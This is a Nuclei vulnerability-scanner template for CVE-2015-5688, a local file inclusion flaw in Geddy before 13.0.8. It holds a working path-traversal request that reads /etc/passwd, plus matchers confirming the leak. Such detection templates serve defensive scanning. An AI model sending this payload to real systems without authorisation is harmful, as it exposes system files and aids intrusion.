nuclei-templates/cves/2015/CVE-2015-5688.yaml

26 lines
537 B
YAML
Raw Normal View History

2021-02-25 02:34:40 +00:00
id: CVE-2015-5688
info:
name: Geddy before v13.0.8 LFI
author: pikpikcu
severity: high
issues: https://github.com/geddy/geddy/issues/697
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
2021-02-25 02:35:55 +00:00
tags: cve,cve2015,geddy,lfi
2021-02-25 02:34:40 +00:00
requests:
- method: GET
path:
2021-02-25 08:36:06 +00:00
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
2021-02-25 02:34:40 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200